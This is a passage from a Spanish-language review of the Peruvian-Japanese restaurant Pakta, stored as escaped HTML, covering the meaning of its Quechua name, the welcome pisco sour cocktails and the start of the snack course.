En su carta, did\u00e1ctica y llena de detalles, te explican que <em>Pakta<\/em> significa <strong>uni\u00f3n<\/strong> en Quechua, y en realidad <strong>Pakta es mucho m\u00e1s que una uni\u00f3n de dos gastronom\u00edas y dos culturas<\/strong>, es la uni\u00f3n del sabor y la t\u00e9cnica; de historias, de pa\u00edses; pero es, a parte, la uni\u00f3n de la sala y la cocina, del servicio y de la calidad, del detalle y de la abundancia.<\/p>\n<p>Una vez decidido el men\u00fa, te ofrecen <strong>la mejor manera de empezar la experiencia<\/strong>, un c\u00f3ctel de bienvenida, c\u00f3mo no, el <strong>pisco sour<\/strong>: el tradicional, el de yuzu, y el de jengibre y cilantro. Insaltables los tres, pero -si me permit\u00eds la recomendaci\u00f3n-, probad el de yuzu: cremoso, espumoso, c\u00edtrico, dulce e intenso. Y, tras el c\u00f3ctel, empieza el festival, con un minifestival en s\u00ed: <strong>los snacks. Un aprendizaje desde el paladar, una motivaci\u00f3n para los sentidos y un placer para el est\u00f3mago, en cada uno de sus colores, salsas, elaboraciones y combinaciones. Lo mejor, la sensaci\u00f3n de no poderte quedar con uno de s\u00f3lo.
